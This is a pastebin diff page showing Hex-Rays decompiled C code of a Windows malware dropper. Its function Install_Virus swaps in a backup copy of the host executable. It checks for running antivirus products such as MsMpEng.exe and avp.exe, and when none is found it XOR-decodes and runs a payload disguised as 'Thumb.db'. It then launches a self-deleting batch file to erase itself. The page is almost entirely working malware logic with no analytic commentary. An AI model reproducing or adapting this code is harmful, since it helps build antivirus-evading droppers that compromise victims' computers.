View difference between Paste ID: <a href="/kEC6jNFR">kEC6jNFR</a> and <a href="/uFi1WbJt">uFi1WbJt</a>

/* This file has been generated by the Hex-Rays decompiler.
1		/* This file has been generated by the Hex-Rays decompiler.
2		Copyright (c) 2009 Hex-Rays <[email protected]>
3
4		Detected compiler: Visual C++
5		*/
6
7		#include <windows.h>
8		#include <defs.h>
9
10
11		//-------------------------------------------------------------------------
12		// Data declarations
13
14		// extern void *CDialog__messageMap; weak
15		// extern void *CWinApp__messageMap; weak
16		extern int (*off_402220)(); // weak
17		extern int (*off_402300)(); // weak
18		extern int (*off_402350)(); // weak
19		extern char Operation[]; // idb
20		extern char aDelFQ0[]; // idb
21		extern char aIfExistSGotoSt[]; // idb
22		extern char aDelFQS[]; // idb
23		extern char aStart[]; // idb
24		extern char Mode[]; // idb
25		extern char Format[]; // idb
26		extern char aWb[]; // idb
27		extern char aRb[]; // idb
28		extern char FileName[]; // idb
29		extern char ApplicationName[]; // idb
30		extern char aFshoster32_exe[]; // idb
31		extern char aFprottray_exe[]; // idb
32		extern char aBdagent_exe[]; // idb
33		extern char aAvp_exe[]; // idb
34		extern char aMsmpeng_exe[]; // idb
35		extern char String1[]; // idb
36		extern char aBak[]; // idb
37		extern char String2[]; // idb
38
39		//-------------------------------------------------------------------------
40		// Function declarations
41
42		#define __thiscall __cdecl // Test compile in C mode
43
44		void *__cdecl sub_401000();
45		int (**__cdecl sub_401010())();
46		void __thiscall sub_401040(void this, char a2);
47		int CWinApp___CWinApp(void); // weak
48		int __thiscall sub_4010B0(void *this);
49		int __thiscall CDialog___CDialog(_DWORD); // weak
50		void __thiscall sub_401150(void this, int a2);
51		void __thiscall sub_4011C0(void this, char a2);
52		void *__cdecl sub_4011F0();
53		int (**__cdecl sub_401200())();
54		signed int __thiscall sub_401210(void *this);
55		BOOL __thiscall sub_401330(int this);
56		BOOL __thiscall sub_401340(int this);
57		int __cdecl sub_401350(LPCSTR lpFileName); // idb
58		void *__cdecl sub_401390(int a1);
59		signed int __cdecl sub_4014B0(const char Filename, const char a2, char a3);
60		int __cdecl ProcessExists(LPCSTR lpString1); // idb
61		void *__cdecl Install_Virus();
62		// void __cdecl operator delete(void *); idb
63		// int __thiscall CDialog___CDialog(_DWORD); weak
64		// int __thiscall CDialog__DoModal(_DWORD); weak
65		// int __thiscall CDialog__OnOK(_DWORD); weak
66		// struct HINSTANCE__ __stdcall AfxFindResourceHandle(const char , const char *); idb
67		// int AfxGetModuleState(void); weak
68		// int __stdcall CDialog__CDialog(_DWORD, _DWORD); weak
69		// int CDialog__OnInitDialog(void); weak
70		// int _CxxFrameHandler(void); weak
71		int __cdecl sub_401C22();
72		// BOOL __stdcall Process32Next(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
73		// BOOL __stdcall Process32First(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
74		// HANDLE __stdcall CreateToolhelp32Snapshot(DWORD dwFlags, DWORD th32ProcessID);
75		// int __stdcall AfxWinMain(struct HINSTANCE__ , struct HINSTANCE__ , char *, int); idb
76		// int __usercall sub_401CB0<eax>(int a1<ebp>);
77		int __cdecl SEH_4010B0();
78		// int __usercall sub_401CD0<eax>(int a1<ebp>);
79		int __cdecl SEH_401150();
80		// BOOL __stdcall CloseHandle(HANDLE hObject);
81		// HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
82		// LPSTR __stdcall lstrcpyA(LPSTR lpString1, LPCSTR lpString2);
83		// UINT __stdcall GetWindowsDirectoryA(LPSTR lpBuffer, UINT uSize);
84		// UINT __stdcall SetErrorMode(UINT uMode);
85		// int __stdcall lstrcmpiA(LPCSTR lpString1, LPCSTR lpString2);
86		// BOOL __stdcall DeleteFileA(LPCSTR lpFileName);
87		// BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
88		// LPSTR __stdcall GetCommandLineA();
89		// void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo);
90		// BOOL __stdcall MoveFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName);
91		// LPSTR __stdcall lstrcatA(LPSTR lpString1, LPCSTR lpString2);
92		// int __stdcall lstrlenA(LPCSTR lpString);
93		// DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize);
94		// DWORD __stdcall GetLastError();
95		// _DWORD __stdcall AfxWinMain(struct HINSTANCE__ , struct HINSTANCE__ , char *, int); weak
96		// size_t __cdecl fread(void DstBuf, size_t ElementSize, size_t Count, FILE File);
97		// size_t __cdecl fwrite(const void Str, size_t Size, size_t Count, FILE File);
98		// int sprintf(char Dest, const char Format, ...);
99		// FILE __cdecl fopen(const char Filename, const char *Mode);
100		// int fprintf(FILE File, const char Format, ...);
101		// int __cdecl fclose(FILE *File);
102		// HINSTANCE __stdcall ShellExecuteA(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd);
103		// BOOL __stdcall EnableWindow(HWND hWnd, BOOL bEnable);
104		// HICON __stdcall LoadIconA(HINSTANCE hInstance, LPCSTR lpIconName);
105		// LRESULT __stdcall SendMessageA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
106
107
108		//----- (00401000) --------------------------------------------------------
109		void *__cdecl sub_401000()
110		{
111		return CWinApp__messageMap;
112		}
113		// 402184: using guessed type void *CWinApp__messageMap;
114
115		//----- (00401010) --------------------------------------------------------
116		int (**__cdecl sub_401010())()
117		{
118		return &off_402220;
119		}
120		// 402220: using guessed type int (*off_402220)();
121
122		//----- (00401040) --------------------------------------------------------
123		void __thiscall sub_401040(void this, char a2)
124		{
125		void *v2; // esi@1
126
127		v2 = this;
128		CWinApp___CWinApp();
129		if ( a2 & 1 )
130		operator delete(v2);
131		return v2;
132		}
133		// 401060: using guessed type int CWinApp___CWinApp(void);
134
135		//----- (004010B0) --------------------------------------------------------
136		int __thiscall sub_4010B0(void *this)
137		{
138		void *v2; // esi@1
139		char v3; // [sp+4h] [bp-70h]@1
140		int v4; // [sp+70h] [bp-4h]@1
141
142		v2 = this;
143		sub_401150(&v3, 0);
144		v4 = 0;
145		((_DWORD )v2 + 8) = &v3;
146		CDialog__DoModal(&v3);
147		v4 = -1;
148		CDialog___CDialog(&v3);
149		return 0;
150		}
151		// 40196A: using guessed type int __thiscall CDialog___CDialog(_DWORD);
152		// 401970: using guessed type int __thiscall CDialog__DoModal(_DWORD);
153
154		//----- (00401150) --------------------------------------------------------
155		void __thiscall sub_401150(void this, int a2)
156		{
157		void *v3; // esi@1
158		HINSTANCE v4; // eax@1
159
160		v3 = this;
161		CDialog__CDialog(102, a2);
162		(_DWORD )v3 = &off_402350;
163		AfxGetModuleState();
164		v4 = AfxFindResourceHandle((const char )0x80, (const char )0xE);
165		((_DWORD )v3 + 24) = LoadIconA(v4, (LPCSTR)0x80);
166		return v3;
167		}
168		// 401A30: using guessed type int AfxGetModuleState(void);
169		// 401A36: using guessed type int __stdcall CDialog__CDialog(_DWORD, _DWORD);
170		// 402350: using guessed type int (*off_402350)();
171
172		//----- (004011C0) --------------------------------------------------------
173		void __thiscall sub_4011C0(void this, char a2)
174		{
175		void *v2; // esi@1
176
177		v2 = this;
178		CDialog___CDialog(this);
179		if ( a2 & 1 )
180		operator delete(v2);
181		return v2;
182		}
183		// 401120: using guessed type int __thiscall CDialog___CDialog(_DWORD);
184
185		//----- (004011F0) --------------------------------------------------------
186		void *__cdecl sub_4011F0()
187		{
188		return CDialog__messageMap;
189		}
190		// 40212C: using guessed type void *CDialog__messageMap;
191
192		//----- (00401200) --------------------------------------------------------
193		int (**__cdecl sub_401200())()
194		{
195		return &off_402300;
196		}
197		// 402300: using guessed type int (*off_402300)();
198
199		//----- (00401210) --------------------------------------------------------
200		signed int __thiscall sub_401210(void *this)
201		{
202		void *v2; // esi@1
203
204		v2 = this;
205		CDialog__OnInitDialog();
206		SendMessageA(((HWND )v2 + 8), 128u, 1u, ((_DWORD )v2 + 24));
207		SendMessageA(((HWND )v2 + 8), 0x80u, 0, ((_DWORD )v2 + 24));
208		Install_Virus();
209		CDialog__OnOK(v2);
210		return 1;
211		}
212		// 401982: using guessed type int __thiscall CDialog__OnOK(_DWORD);
213		// 401A3C: using guessed type int CDialog__OnInitDialog(void);
214
215		//----- (00401330) --------------------------------------------------------
216		BOOL __thiscall sub_401330(int this)
217		{
218		return EnableWindow((HWND )(this + 32), 0);
219		}
220
221		//----- (00401340) --------------------------------------------------------
222		BOOL __thiscall sub_401340(int this)
223		{
224		return EnableWindow((HWND )(this + 32), 1);
225		}
226
227		//----- (00401350) --------------------------------------------------------
228		signed int __cdecl sub_401350(LPCSTR lpFileName)
229		{
230		HANDLE v1; // esi@1
231		signed int result; // eax@3
232
233		v1 = CreateFileA(lpFileName, 0x80000000u, 1u, 0, 3u, 0, 0);
234		if ( v1 != (HANDLE)-1 \|\| GetLastError() != 2 )
235		{
236		CloseHandle(v1);
237		result = 1;
238		}
239		else
240		{
241		result = 0;
242		}
243		return result;
244		}
245
246		//----- (00401390) --------------------------------------------------------
247		void *__cdecl sub_401390(int a1)
248		{
249		int v1; // esi@1
250		int v2; // ST18_4@2
251		void *result; // eax@3
252		FILE *v4; // esi@3
253		CHAR File; // [sp+8h] [bp-208h]@1
254		char v6; // [sp+9h] [bp-207h]@1
255		__int16 v7; // [sp+109h] [bp-107h]@1
256		char v8; // [sp+10Bh] [bp-105h]@1
257		CHAR String2; // [sp+10Ch] [bp-104h]@1
258		char v10; // [sp+10Dh] [bp-103h]@1
259		__int16 v11; // [sp+20Dh] [bp-3h]@1
260		char v12; // [sp+20Fh] [bp-1h]@1
261
262		String2 = 0;
263		memset(&v10, 0, 0x100u);
264		v11 = 0;
265		v12 = 0;
266		File = 0;
267		memset(&v6, 0, 0x100u);
268		v7 = 0;
269		v1 = 0;
270		v8 = 0;
271		SetErrorMode(1u);
272		GetWindowsDirectoryA(&String2, 0x104u);
273		lstrcpyA(&File, &String2);
274		do
275		{
276		v2 = v1++;
277		sprintf(&File, "%s\\temp\\temp%d.bat", &String2, v2);
278		}
279		while ( sub_401350(&File) );
280		result = fopen(&File, L"w");
281		v4 = (FILE *)result;
282		if ( result )
283		{
284		((void (__cdecl )(void , _DWORD))fprintf)(result, ":start\r\n");
285		fprintf(v4, "del /f /q \"%s\"\r\n", a1);
286		fprintf(v4, "if exist \"%s\" goto start\r\n", a1);
287		fprintf(v4, "del /f /q %%0\r\n");
288		fclose(v4);
289		result = ShellExecuteA(0, "open", &File, 0, 0, 0);
290		}
291		return result;
292		}
293
294		//----- (004014B0) --------------------------------------------------------
295		signed int __cdecl sub_4014B0(const char Filename, const char a2, char a3)
296		{
297		FILE *v3; // esi@1
298		FILE *v4; // ebx@2
299		size_t i; // eax@3
300		signed int j; // ecx@4
301		char DstBuf[1024]; // [sp+Ch] [bp-400h]@3
302
303		v3 = fopen(Filename, "rb");
304		if ( !v3 )
305		return 0;
306		v4 = fopen(a2, "wb");
307		if ( !v4 )
308		{
309		fclose(v3);
310		return 0;
311		}
312		memset(DstBuf, 0, sizeof(DstBuf));
313		for ( i = fread(DstBuf, 1u, 0x400u, v3); i; i = fread(DstBuf, 1u, 0x400u, v3) )
314		{
315		for ( j = 0; j < (signed int)i; ++j )
316		DstBuf[j] ^= a3;
317		fwrite(DstBuf, i, 1u, v4);
318		memset(DstBuf, 0, sizeof(DstBuf));
319		}
320		fclose(v3);
321		fclose(v4);
322		return 1;
323		}
324		// 4014B0: using guessed type char DstBuf[1024];
325
326		//----- (004015A0) --------------------------------------------------------
327		signed int __cdecl ProcessExists(LPCSTR lpString1)
328		{
329		DWORD v1; // ebp@1
330		HANDLE v2; // esi@1
331		signed int result; // eax@7
332		PROCESSENTRY32 pe; // [sp+8h] [bp-128h]@1
333
334		v1 = -1;
335		pe.dwSize = 296;
336		v2 = CreateToolhelp32Snapshot(2u, 0);
337		if ( v2 )
338		{
339		if ( Process32First(v2, &pe) )
340		{
341		if ( lstrcmpiA(lpString1, pe.szExeFile) )
342		{
343		while ( Process32Next(v2, &pe) )
344		{
345		if ( !lstrcmpiA(lpString1, pe.szExeFile) )
346		goto LABEL_6;
347		}
348		}
349		else
350		{
351		LABEL_6:
352		v1 = pe.th32ProcessID;
353		}
354		}
355		CloseHandle(v2);
356		result = v1;
357		}
358		else
359		{
360		result = -1;
361		}
362		return result;
363		}
364
365		//----- (00401630) --------------------------------------------------------
366		void *__cdecl Install_Virus()
367		{
368		int v0; // eax@1
369		int v1; // eax@6
370		CHAR *v2; // eax@11
371		struct _PROCESS_INFORMATION ProcessInformation; // [sp+10h] [bp-360h]@11
372		struct _STARTUPINFOA StartupInfo; // [sp+20h] [bp-350h]@11
373		CHAR String; // [sp+64h] [bp-30Ch]@1
374		char v7[259]; // [sp+65h] [bp-30Bh]@1
375		CHAR ExistingFileName; // [sp+168h] [bp-208h]@1
376		char v9[259]; // [sp+169h] [bp-207h]@1
377		CHAR String2; // [sp+26Ch] [bp-104h]@1
378		char v11; // [sp+26Dh] [bp-103h]@1
379		__int16 v12; // [sp+36Dh] [bp-3h]@1
380		char v13; // [sp+36Fh] [bp-1h]@1
381
382		String2 = 0;
383		String = 0;
384		memset(&v11, 0, 0x100u);
385		v12 = 0;
386		v13 = 0;
387		ExistingFileName = 0;
388		memset(v7, 0, 0x100u);
389		(_WORD )&v7[256] = 0;
390		v7[258] = 0;
391		memset(v9, 0, 0x100u);
392		(_WORD )&v9[256] = 0;
393		v9[258] = 0;
394		GetModuleFileNameA(0, &String2, 0x104u);
395		lstrcpyA(&String, &String2);
396		lstrcpyA(&ExistingFileName, &String2);
397		v0 = lstrlenA(&String) - 1;
398		if ( v0 >= 0 )
399		{
400		while ( *(&String + v0) != 92 )
401		{
402		--v0;
403		if ( v0 < 0 )
404		goto LABEL_6;
405		}
406		v7[v0] = 0;
407		}
408		LABEL_6:
409		lstrcatA(&String, "tmp.tmp");
410		MoveFileA(&String2, &String);
411		v1 = lstrlenA(&ExistingFileName) - 1;
412		if ( v1 >= 0 )
413		{
414		while ( *(&ExistingFileName + v1) != 46 )
415		{
416		--v1;
417		if ( v1 < 0 )
418		goto LABEL_11;
419		}
420		v9[v1] = 0;
421		}
422		LABEL_11:
423		lstrcatA(&ExistingFileName, "bak");
424		MoveFileA(&ExistingFileName, &String2);
425		StartupInfo.cb = 0;
426		memset(&StartupInfo.lpReserved, 0, 0x40u);
427		ProcessInformation.hThread = 0;
428		ProcessInformation.hProcess = 0;
429		ProcessInformation.dwProcessId = 0;
430		ProcessInformation.dwThreadId = 0;
431		GetStartupInfoA(&StartupInfo);
432		v2 = GetCommandLineA();
433		CreateProcessA(&String2, v2, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);
434		if ( ProcessExists("ccsvchst.exe") == -1 )
435		{
436		if ( ProcessExists("MsMpEng.exe") == -1 )
437		{
438		if ( ProcessExists("avp.exe") == -1 )
439		{
440		if ( ProcessExists("bdagent.exe") == -1 )
441		{
442		if ( ProcessExists("FProtTray.exe") == -1 )
443		{
444		if ( ProcessExists("fshoster32.exe") == -1 )
445		{
446		GetStartupInfoA(&StartupInfo);
447		if ( sub_4014B0("Thumb.db", "Thumb.db.tmp", -86) )
448		CreateProcessA("Thumb.db.tmp", 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);
449		}
450		}
451		}
452		}
453		}
454		}
455		DeleteFileA("Thumb.db");
456		return sub_401390((int)&String);
457		}
458		// 401630: using guessed type char var_30B[259];
459		// 401630: using guessed type char var_207[259];
460
461		//----- (00401C22) --------------------------------------------------------
462		int __cdecl sub_401C22()
463		{
464		return 0;
465		}
466
467		//----- (00401CB0) --------------------------------------------------------
468		int __usercall sub_401CB0<eax>(int a1<ebp>)
469		{
470		return CDialog___CDialog(a1 - 112);
471		}
472		// 401120: using guessed type int __thiscall CDialog___CDialog(_DWORD);
473
474		//----- (00401CB8) --------------------------------------------------------
475		int __cdecl SEH_4010B0()
476		{
477		return _CxxFrameHandler();
478		}
479		// 401A92: using guessed type int _CxxFrameHandler(void);
480
481		//----- (00401CD0) --------------------------------------------------------
482		int __usercall sub_401CD0<eax>(int a1<ebp>)
483		{
484		return CDialog___CDialog((_DWORD )(a1 - 16));
485		}
486		// 40196A: using guessed type int __thiscall CDialog___CDialog(_DWORD);
487
488		//----- (00401CD8) --------------------------------------------------------
489		int __cdecl SEH_401150()
490		{
491		return _CxxFrameHandler();
492		}
493		// 401A92: using guessed type int _CxxFrameHandler(void);
494
495		// ALL OK, 21 function(s) have been successfully decompiled